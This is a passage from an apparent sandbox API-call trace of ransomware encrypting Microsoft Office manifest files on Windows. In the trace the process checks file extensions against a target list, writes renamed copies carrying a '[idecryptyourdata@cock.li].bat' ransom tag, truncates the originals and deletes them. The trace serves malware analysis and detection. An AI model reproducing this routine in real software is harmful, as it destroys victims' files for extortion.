Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.383] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 1 [0059.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.384] lstrlenW (lpString=".doc") returned 4 [0059.384] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString=".docx") returned 5 [0059.384] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.384] lstrlenW (lpString=".pdf") returned 4 [0059.384] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString=".xls") returned 4 [0059.384] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString=".xlsx") returned 5 [0059.384] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.384] lstrlenW (lpString=".ppt") returned 4 [0059.384] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.384] lstrlenW (lpString=".zip") returned 4 [0059.384] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.384] lstrlenW (lpString=".rar") returned 4 [0059.384] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString=".bz2") returned 4 [0059.384] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString=".7z") returned 3 [0059.384] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.384] lstrlenW (lpString=".dbf") returned 4 [0059.384] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.385] lstrlenW (lpString=".1cd") returned 4 [0059.385] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.385] lstrlenW (lpString=".jpg") returned 4 [0059.385] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.385] lstrlenW (lpString=".doc") returned 4 [0059.385] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString=".docx") returned 5 [0059.385] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.385] lstrlenW (lpString=".pdf") returned 4 [0059.385] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString=".xls") returned 4 [0059.385] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString=".xlsx") returned 5 [0059.385] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.385] lstrlenW (lpString=".ppt") returned 4 [0059.385] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.385] lstrlenW (lpString=".zip") returned 4 [0059.385] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.385] lstrlenW (lpString=".rar") returned 4 [0059.385] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString=".bz2") returned 4 [0059.385] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.385] lstrlenW (lpString=".7z") returned 3 [0059.386] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.386] lstrlenW (lpString=".dbf") returned 4 [0059.386] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.386] lstrlenW (lpString=".1cd") returned 4 [0059.386] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0059.386] lstrlenW (lpString=".jpg") returned 4 [0059.386] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.386] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.386] lstrlenW (lpString="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 53 [0059.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.386] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=1261) returned 1 [0059.386] CloseHandle (hObject=0x354) returned 1 [0059.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.387] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.387] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.387] GetLastError () returned 0x0 [0059.387] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.421] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.422] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.422] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.422] SetEndOfFile (hFile=0x370) returned 1 [0059.422] CloseHandle (hObject=0x370) returned 1 [0059.423] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.423] SetEndOfFile (hFile=0x354) returned 1 [0059.424] CloseHandle (hObject=0x354) returned 1 [0059.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.424] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 1 [0059.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.425] lstrlenW (lpString=".doc") returned 4 [0059.425] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString=".docx") returned 5 [0059.425] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.425] lstrlenW (lpString=".pdf") returned 4 [0059.425] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString=".xls") returned 4 [0059.425] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString=".xlsx") returned 5 [0059.425] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.425] lstrlenW (lpString=".ppt") returned 4 [0059.425] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.425] lstrlenW (lpString=".zip") returned 4 [0059.425] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.425] lstrlenW (lpString=".rar") returned 4 [0059.425] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString=".bz2") returned 4 [0059.425] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.425] lstrlenW (lpString=".7z") returned 3 [0059.425] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.426] lstrlenW (lpString=".dbf") returned 4 [0059.426] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.426] lstrlenW (lpString=".1cd") returned 4 [0059.426] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.426] lstrlenW (lpString=".jpg") returned 4 [0059.426] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.426] lstrlenW (lpString=".doc") returned 4 [0059.426] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString=".docx") returned 5 [0059.426] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.426] lstrlenW (lpString=".pdf") returned 4 [0059.426] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString=".xls") returned 4 [0059.426] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.426] lstrlenW (lpString=".xlsx") returned 5 [0059.426] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.426] lstrlenW (lpString=".ppt") returned 4 [0059.426] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.427] lstrlenW (lpString=".zip") returned 4 [0059.427] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.427] lstrlenW (lpString=".rar") returned 4 [0059.427] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.427] lstrlenW (lpString=".bz2") returned 4 [0059.427] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.427] lstrlenW (lpString=".7z") returned 3 [0059.427] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.427] lstrlenW (lpString=".dbf") returned 4 [0059.427] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.427] lstrlenW (lpString=".1cd") returned 4 [0059.427] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0059.427] lstrlenW (lpString=".jpg") returned 4 [0059.427] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.427] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.427] lstrlenW (lpString="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 53 [0059.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.428] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=399528) returned 1 [0059.428] CloseHandle (hObject=0x354) returned 1 [0059.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.428] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.428] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.428] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.429] GetLastError () returned 0x0 [0059.429] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x618a8, lpOverlapped=0x0) returned 1 [0059.572] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x618b0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x618b0, lpOverlapped=0x0) returned 1 [0059.579] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.580] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.580] SetEndOfFile (hFile=0x370) returned 1 [0059.580] CloseHandle (hObject=0x370) returned 1 [0059.588] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.588] SetEndOfFile (hFile=0x354) returned 1 [0059.592] CloseHandle (hObject=0x354) returned 1 [0059.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.592] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 1 [0059.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.592] lstrlenW (lpString=".doc") returned 4 [0059.592] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.592] lstrlenW (lpString=".docx") returned 5 [0059.592] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.592] lstrlenW (lpString=".pdf") returned 4 [0059.592] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".xls") returned 4 [0059.593] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".xlsx") returned 5 [0059.593] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.593] lstrlenW (lpString=".ppt") returned 4 [0059.593] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString=".zip") returned 4 [0059.593] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.593] lstrlenW (lpString=".rar") returned 4 [0059.593] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".bz2") returned 4 [0059.593] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".7z") returned 3 [0059.593] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString=".dbf") returned 4 [0059.593] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString=".1cd") returned 4 [0059.593] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString=".jpg") returned 4 [0059.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.593] lstrlenW (lpString=".doc") returned 4 [0059.593] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".docx") returned 5 [0059.593] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.593] lstrlenW (lpString=".pdf") returned 4 [0059.593] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.593] lstrlenW (lpString=".xls") returned 4 [0059.594] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.594] lstrlenW (lpString=".xlsx") returned 5 [0059.594] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.594] lstrlenW (lpString=".ppt") returned 4 [0059.594] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.594] lstrlenW (lpString=".zip") returned 4 [0059.594] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.594] lstrlenW (lpString=".rar") returned 4 [0059.594] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.594] lstrlenW (lpString=".bz2") returned 4 [0059.594] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.594] lstrlenW (lpString=".7z") returned 3 [0059.594] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.594] lstrlenW (lpString=".dbf") returned 4 [0059.594] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.594] lstrlenW (lpString=".1cd") returned 4 [0059.594] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 104 [0059.595] lstrlenW (lpString=".jpg") returned 4 [0059.595] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.595] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.595] lstrlenW (lpString="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 53 [0059.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.595] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=527958) returned 1 [0059.595] CloseHandle (hObject=0x354) returned 1 [0059.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.595] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.596] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.596] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.596] GetLastError () returned 0x0 [0059.596] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, 